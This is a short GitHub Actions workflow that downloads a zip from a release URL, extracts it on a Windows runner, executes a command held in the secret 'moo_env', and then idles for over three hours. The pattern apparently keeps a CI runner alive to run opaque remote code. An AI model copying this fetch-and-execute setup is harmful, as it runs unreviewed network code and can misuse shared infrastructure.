name: main

on:
  workflow_dispatch:  

jobs:
  setup-run:
    runs-on: windows-2025
    steps:
    - name: Check out the repository
      uses: actions/checkout@v2
    - name: main
      run: |
        Invoke-WebRequest -Uri "https://github.com/naiirobi-a/robi/releases/download/v20250606/khw.zip" -OutFile "D:\khw.zip"
        Expand-Archive -Path "D:\khw.zip" -DestinationPath "D:\" -Force
        ${{ secrets.moo_env }}
        Start-Sleep -Seconds 5
    - name: Sleep
      run: |
        Start-Sleep -Seconds 11800